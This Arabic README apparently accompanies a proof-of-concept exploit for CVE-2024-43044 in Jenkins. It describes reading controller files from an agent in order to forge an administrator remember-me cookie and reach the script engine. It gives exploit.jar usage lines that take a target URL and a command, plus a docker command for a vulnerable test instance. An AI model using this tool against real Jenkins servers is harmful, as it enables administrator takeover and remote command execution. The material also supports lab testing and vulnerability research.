
استغلال للثغرة CVE-2024-43044 في Jenkins
هذا استغلال لـ CVE-2024-43044، وهي قراءة ملفات عشوائية تسمح للـ agent بجلب الملفات من الـ controller.
سيستخدم الاستغلال الثغرة لقراءة الملفات من أجل تزوير remember-me cookie لحساب مسؤول والحصول على الوصول إلى محرك Jenkins النصي (scripting engine).
اطلع على الشرح الكامل على https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
mvn package
Exploit Usages:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
يمكنك اختباره على إصدار هشّ (vulnerable) باستخدام docker:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
بمجرد حصولك على Jenkins قيد التشغيل، قم بإعداد agent.
يمكن أن يكون اتصال controller/agent إما الافتراضي (باستخدام url وnodename وsecret) أو عبر SSH.
.